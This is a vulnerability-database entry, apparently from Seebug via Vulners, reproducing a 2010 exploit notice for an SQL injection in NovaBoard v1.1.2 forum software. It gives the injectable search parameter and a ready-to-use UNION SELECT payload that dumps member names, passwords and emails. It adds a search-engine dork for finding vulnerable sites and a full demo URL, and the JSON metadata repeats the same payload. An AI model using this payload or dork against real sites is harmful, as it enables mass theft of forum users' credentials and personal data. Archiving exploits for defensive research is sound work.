Search...

NovaBoard v1.1.2 SQL Injection Vulnerability

2010-01-29T00:00:00

ID SSV:19021
Type seebug
Reporter Root
Modified 2010-01-29T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #############################################################
# NovaBoard v1.1.2 SQL Injection Vulnerability
   
# Plugin Home: http://www.novaboard.net/
   
# Author: Delibey
   
# Site: www.1923turk.com
  
##############################################################
   
   
# Download   Script  : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip
                                     
   
    
# Exploit: index.php?page=search&amp;topic=1&amp;pf=1&amp;search=xek&amp;author_id=1&amp;forums[1923Turk]=[SQL-inj]
   
   
#  1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
              
#  Dork  : &quot;Powered by NovaBoard v1.1.2&quot;          
   
# Demo: http://server/index.php?page=search&amp;topic=1&amp;pf=1&amp;search=xek&amp;author_id=1&amp;forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
   
    
##############################################################
# Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-19021", "status": "poc", "bulletinFamily": "exploit", "modified": "2010-01-29T00:00:00", "title": "NovaBoard v1.1.2 SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19021", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2010-01-29T00:00:00", "sourceData": "\n #############################################################\r\n# NovaBoard v1.1.2 SQL Injection Vulnerability\r\n \r\n# Plugin Home: http://www.novaboard.net/\r\n \r\n# Author: Delibey\r\n \r\n# Site: www.1923turk.com\r\n \r\n##############################################################\r\n \r\n \r\n# Download Script : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip\r\n \r\n \r\n \r\n# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj]\r\n \r\n \r\n# 1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+\r\n \r\n# Dork : "Powered by NovaBoard v1.1.2" \r\n \r\n# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+\r\n \r\n \r\n##############################################################\r\n# Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO\r\n##############################################################\n ", "id": "SSV:19021", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:18:10", "reporter": "Root", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T18:18:10", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:18:10", "rev": 2}, "vulnersScore": 0.0}, "references": [], "immutableFields": []}